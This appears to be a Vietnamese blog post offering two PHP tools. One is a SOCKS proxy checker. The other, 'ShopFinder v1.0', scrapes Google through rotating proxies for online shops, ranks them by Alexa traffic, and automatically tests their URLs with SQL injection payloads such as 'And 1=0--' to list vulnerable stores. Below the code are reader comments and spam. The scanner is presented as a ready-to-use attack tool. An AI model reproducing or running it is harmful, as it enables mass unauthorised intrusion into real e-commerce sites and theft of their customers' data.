21:57
zeko sock
code check sock trước
Code:
<title>check sock</title>
<form action="" method="POST">
<textarea name="sock" cols="50" rows="20"></textarea>
<input type="submit" value="check" name="submit1" />
</form><br>
<?php
@set_time_limit(0);
function get_sock($info)
{
preg_match("/[0-9]?[0-9]?[0-9]?\.[0-9]?[0-9]?[0-9]?\.[0-9]?[0-9]?[0-9]?\.[0-9]?[0-9]?[0-9]?:[0-9]?[0-9]?[0-9]?[0-9]?[0-9]?/",$info,$return);
return $return[0];
}
function get_page($url,$proxy)
{
$ch=curl_init();
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_PROXY,$proxy);
curl_setopt($ch,CURLOPT_PROXYTYPE,CURLPROXY_SOCKS5);
curl_setopt($ch,CURLOPT_HTTPPROXYTUNNEL,1);
curl_setopt($ch,CURLOPT_COOKIEFILE,"C:\xampp\htdocs\check\cookie.txt");
curl_setopt($ch,CURLOPT_COOKIEJAR,"C:\xampp\htdocs\check\cookie.txt");
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_TIMEOUT,5);
$page=curl_exec($ch);
curl_close($ch);
return $page;
}
if(isset($_POST["sock"]))
{
$sock=explode("\n",$_POST["sock"]);
$i=0;
$arrSock = array();
while($sock[$i]!="")
{
$sock[$i]=get_sock(trim($sock[$i]));
$page=get_page("http://www.google.com.vn/search?q=allinurl:admin.asp?id=",$sock[$i]);
if($page!="" && strpos($page,"302 Moved")==false)
{
echo "<font color='green'>".$sock[$i]."</font><br>";ob_flush();flush();
array_push($arrSock,$sock[$i]);
}
else
{
echo "<font color='red'>".$sock[$i]."</font><br>";ob_flush();flush();
}
$i++;
}
echo "====List sock ok====<br>";
$x = join("\r\n",$arrSock);
echo "<textarea rows='10' cols = '20'>".$x."</textarea>";
}
?>Code:
<title>ShopFinder v1.0</title>
<form action="" method="POST">
<table>
<tr><td>List keywords</td><td>List socks</td></tr>
<tr><td><textarea name="keyword" cols=40 rows=15>google nha'</textarea></td><td><textarea name="sock" cols=40 rows=15>sock nha'</textarea></td></tr>
<tr><td></td><td><input type="submit" value="start" /></td></tr>
</table>
</form>
<?php
######################
# cac' ham` ho~ tro. #
######################
function getPage($url,$proxy)
{
$ch=curl_init();
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
//sock5
if($proxy)
{
curl_setopt($ch,CURLOPT_PROXY,$proxy);
curl_setopt($ch,CURLOPT_PROXYTYPE,CURLPROXY_SOCKS5);
curl_setopt($ch,CURLOPT_HTTPPROXYTUNNEL,1);
}
//user-agent
$agent = "Mozilla/5.0 (Windows; ?; Windows NT 5.1; *rv:*) Gecko/* Firefox/0.9*";
curl_setopt($ch,CURLOPT_USERAGENT,$agent);
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_TIMEOUT,10);
$page=curl_exec($ch);
curl_close($ch);
return $page;
}
function getDomain($url)
{
$domain = str_replace("http://","",$url);
$domain = str_replace("www.","",$domain);
$domain = str_replace(strstr($domain,"/"),"",$domain);
return $domain;
}
function notInStr($arrFilterKeyword,$str)
{
foreach($arrFilterKeyword as $filterKeyword)
{
if(strpos($str,$filterKeyword))
{
return false;
}
}
return true;
}
function cleanUpPage($page)
{
$ret = htmlentities($page);
$ret = str_replace("=","vndarkcode",$ret);
$arr = array("/[\s]/","/http/","/\"/");
$ret = preg_replace($arr,"",$ret);
return $ret;
}
function filter($link,$rankAlexa,$arrSearch)
{
$page=getPage("http://www.alexa.com/search?q=".getDomain($link)."&r=home_home&p=bigtop","");
$page=str_replace("\n","",$page);
preg_match("/Alexa[\s]Traffic[\s]Rank:(.*?)\/a\>/",$page,$tmp);
preg_match("/\"\>(.*)\</",$tmp[1],$result);
//echo (intval(str_replace(",","",$result[1])));ob_flush();flush();
if(intval(str_replace(",","",$result[1])) > $rankAlexa || !preg_match("/\d/",str_replace(",","",$result[1])))
return 0;
$page = htmlentities(getPage($link,""));
//echo $page;ob_flush();flush();
if(notInStr($arrSearch,$page))
return 0;
return 1;
}
#######################
# cac' ham` thuc. thi #
#######################
function getLinksFromGoogle($keyword,$arrFilterKeyword,$arrDomainChecked,$arrSock)
{
$sockUsing = array_pop($arrSock);
$limit = 200000;
$arrGoogle = array(
"google.com",
"google.ca",
"google.com.au",
"google.co.uk",
"google.fr",
"google.ch",
"google.com.vn",
"google.nl",
"google.es",
"google.ie",
"google.de",
"google.co.jp"
);
$arrLink = array();
foreach($arrGoogle as $google)
{
$h = 0;
while($h < $limit +1)
{
$urlGoogle = "http://www.".$google."/search?&q=".$keyword."&start=".$h."&num=100&filter=1&tbs=cpk:1";
//echo $urlGoogle."<br>";ob_flush();flush();
$pageGoogle = getPage($urlGoogle,$sockUsing);
if($pageGoogle == "")
{
if($sockUsing = array_pop($arrSock))
{
$h = $h - 100;
}
else
{
exit("nap. them^ sock di");
}
}
if(strpos($pageGoogle,"did not match any documents")==true)
{
break;
}
if(strpos($pageGoogle,"http://www.".$google."/support/websearch/bin/answer.py?answer=86640")==true || strpos($pageGoogle,"302 Moved")==true)
{
if($sockUsing = array_pop($arrSock))
{
$h = $h - 100;
}
else
{
exit("nap. them^ sock di");
}
}
preg_match_all("/href=[\"]http:\/\/(.*?)\"/",$pageGoogle,$line);
$i=0;
while($line[1][$i]!="")
{
if(notInStr($arrFilterKeyword,$line[1][$i]) && !in_array(getDomain($line[1][$i]),$arrDomainChecked) && (preg_match("/\?/",$line[1][$i]) || preg_match("/\/(\d+)\//",$line[1][$i])))
{
array_push($arrLink,"http://".$line[1][$i]);
array_push($arrDomainChecked,getDomain($line[1][$i]));
}
$i++;
}
if((!strpos($pageGoogle,"start=".($h+100))))
{
break;
}
$h += 100;
}
}
array_push($arrSock,$sockUsing);
return $arrLink;
}
function check_sql_injection($url)
{
if(preg_match("/\?/",$url))
{
$pos[0]=strpos($url,"&");$i=1;
while($pos[$i]=strpos($url,"&",$pos[$i-1]+1))
{
$i=$i+1;
}
$array_url[0]=stripslashes($url."'");$i=1;
while(!$pos[$i-1]=="")
{
$temp2=substr($url,$pos[$i-1]);
$temp1=substr_replace($url,"'",$pos[$i-1]);
$array_url[$i]=stripslashes($temp1.$temp2);
$i=$i+1;
}
}
elseif(preg_match("/\/(\d+)\//",$url))
{
$array_url[0]=stripslashes($url."'");
preg_match_all("/\/(\d+)\//",$url,$result);
foreach($result[1] as $var)
array_push($array_url,stripslashes(str_replace($var,$var."'",$url)));
}
$i=0;
while(!$array_url[$i]=="")
{
//echo $array_url[$i]."<br>";ob_flush();flush();
$page = strtolower(cleanUpPage(getPage($array_url[$i],"")));
if(strpos($page,"sql"))
{
return $array_url[$i];
}
else
{
if($page != strtolower(cleanUpPage(getPage(str_replace("'","",$array_url[$i]),""))))
{
//echo 1;ob_flush();flush();
$arrCheck = array(
array("%20And%201=0--","%20And%201=1--","%20And%202=2--"),
array("%20'%20And%201=0+--+","%20'%20And%201=1+--+","%20'%20And%202=2+--+"),
array("%20/*!%20And%201=0*/--","%20/*!%20And%201=1*/--","%20/*!%20And%202=2*/--"),
array("%20'/*!%20And%201=0*/+--+","%20'/*!%20And%201=1*/+--+","%20'/*!%20And%202=2*/+--+"));
foreach($arrCheck as $check)
{
$a = explode("vndarkcode",cleanUpPage(getPage(str_replace("'",$check[0],$array_url[$i]),"")));
$b = explode("vndarkcode",cleanUpPage(getPage(str_replace("'",$check[1],$array_url[$i]),"")));
$c = explode("vndarkcode",cleanUpPage(getPage(str_replace("'",$check[2],$array_url[$i]),"")));
$d = 0;
for($k=0;$k<=count($a);$k++)
{
if(($a[$k] != $b[$k]) && ($b[$k] == $c[$k]))
$d++;
}
if($d > 10)
{
return $array_url[$i];
}
}
}
}
$i=$i+1;
}
return 0;
}
function scanDetail($url,$fileType,$arrSock)
{
$sockUsing = array_pop($arrSock);
$keyword="site:".getDomain($url)."+filetype:".$fileType;
$blackList = array();
$end=1;
while($end<=10)
{
$urlGoogle="http://www.google.com/search?q=".$keyword."&start=0&num=100";
$pageGoogle=getPage($urlGoogle,$sockUsing);
if($pageGoogle == "")
{
if($pageGoogle == "")
{
if($sockUsing = array_pop($arrSock))
{
$end = $end - 1;
}
else
{
exit("nap. them^ sock di");
}
}
}
if(strpos($pageGoogle,"did not match any documents")==true)
{
break ;
}
if(strpos($pageGoogle,"http://www.google.com/support/websearch/bin/answer.py?answer=86640")==true || strpos($pageGoogle,"302 Moved")==true)
{
if($sockUsing = array_pop($arrSock))
{
$end = $end - 1;
}
else
{
exit("nap. them^ sock di");
}
}
preg_match_all("/href=\"http:\/\/(.*?)\"/",$pageGoogle,$line);
$i=0;
while($line[1][$i]!="")
{
if(!preg_match("/google.com|youtube.com|cache|alexa.com|search\?/",$line[1][$i]))
{
if(!preg_match("/\?/",$line[1][$i]))
{
preg_match("/\/(.*?)\./",$line[1][$i],$file);
$keyword=$keyword."+-".$file[1].".".$filetype;
}
else
{
preg_match("/\/(.*?)\./",$line[1][$i],$file);
if(!in_array($file[1],$blackList))
{
$result = check_sql_injection("http://".$line[1][$i]);
if($result)
{
array_push($arrSock,$sockUsing);
return $result;
}
$keyword=$keyword."+-".$file[1].".".$fileType;
array_push($blackList,$file[1]);
}
}
}
$i=$i+1;
}
if((!strpos($pageGoogle,"start=".($h+100))))
{
break;
}
$end=$end+1;
}
array_push($arrSock,$sockUsing);
return 0;
}
if(isset($_POST["keyword"]) && isset($_POST["sock"]))
{
set_time_limit(0);
// chi? check shop co' so^' rank nho? hon* 5tr
$rankAlexa = 5000000;
// cac' keyword can` phai? co' trong page
$arrSearch = array("price","cart","basket","$","add to");
// trong link co' cac' tu` nay` se~ bi. loai. bo?
$arrFilterKeyword = array("google","wikipedia.org","youtube.com","alexa.com","yahoo.com","javascript:void","cache","rapidshare.com","mysql.com","php.net","bing.com","msn.com","microsoft.com","union","torrent","live.com","microsofttranslator.com","amazon.com","facebook.com","info.com","Info.com","order+by","..","'","forum","forum.","hack","security","milw0rm.com","exploit","ebay.com","apple.com","blog",".xml","flickr.com",".pdf",".txt","\"",".vn","india",".in",".cn",".kr",".jp",".hk",".hu",".li",".ru","thailand","thai",".tw","taiwan");
echo "<font color='red'><h3>[+]Shop finder v1.0 code by vndarkcode</h3></font>";ob_flush();flush();
$arrSock = explode("\r\n",$_POST["sock"]);
$arrDomainChecked = array();
$arrKeyword = explode("\r\n",$_POST["keyword"]);
foreach($arrKeyword as $keyword)
{
echo "<font color='green'>[+]Checking keyword : ".$keyword."</font><br>";ob_flush();flush();
echo " <font color='brown'>[*]Geting links from google</font><br>";ob_flush();flush();
$keyword = ltrim($keyword);
$keyword = rtrim($keyword);
$keyword = str_replace(" ","xxx",$keyword);
$keyword = str_replace("+","xxx",$keyword);
$keyword = urlencode($keyword);
$keyword = str_replace("xxx","+",$keyword);
$arrLink = getLinksFromGoogle($keyword,$arrFilterKeyword,$arrDomainChecked,$arrSock);
echo " <font color='brown'>[*]Found ".count($arrLink)." shops</font><br>";ob_flush();flush();
echo " <font color='brown'>[*]Finding bug shops</font><br>";ob_flush();flush();
$i = 0;
foreach($arrLink as $link)
{
if(filter($link,$rankAlexa,$arrSearch))
{
$result = check_sql_injection($link);
if($result)
{
echo " <a href=\"".$result."\" target='_blank'>".$result."</a> => sql injection<br>";ob_flush();flush();$i++;
}
else
{
$result = scanDetail($link,"php",$arrSock);
if($result)
{
echo " <a href=\"".$result."\" target='_blank'>".$result."</a> => sql injection<br>";ob_flush();flush();$i++;
}
}
}
}
echo " <font color='brown'>[*]Found ".$i."/".count($arrLink)." bugs shop</font><br>";ob_flush();flush();
echo " <font color='brown'>[*]Done</font><br>";ob_flush();flush();
}
}
?>
Posted in: 
8 nhận xét:
em chang hieu gi
K hiểu gì hết, cái này dùng sao vậy a...
a có thể cho e link down của 1 tools tìm shop lỗi sql được k ak`... chứ như thế này... e chịu... thanks a trước
đây là code php ......
sử dụng như thế nào...nhúng vào web a
Xem phim online, Chúng tôi luôn mang đến cho các bạn những cộ phim hay nhất, mới nhất với độ load nhanh nhất, bạn không cần phải tốn nhiều thời gian để ì ạch xem 1 bộ phim yêu thích nào đó, giờ đây thật nhanh chóng bạn chỉ cần bấm và xem. Ngoài ra bạn có thể xem phim Full-HD mà không phải mất bất kỳ mức phí nào như:
xem phim hd
xem phim oan hồn
xem phim lật mặt
xem phim bom tấn Attack on Titan
xem phim đạo hạ sơn 2015
xem phim đạo sĩ hạ sơn
xem phim Bạo Phong Ngữ
xem phim cổ trang lữ hậu 2015
xem phim Đao Hạ Lưu Tình được TVB
xem phim Tung Hoành Hollywood
xem phim báu vật thành cát tư hãn
xem phim mười năm của chúng ta
xem phim ngọa hổ tàng long 2
phim hoa lệ chuyển thân
Phim nữ thần lửa jung yi tập cuối
anonyviet.com
http://anonyviet.com
Yes! Finally someone writes about %keyword1%.
Đăng nhận xét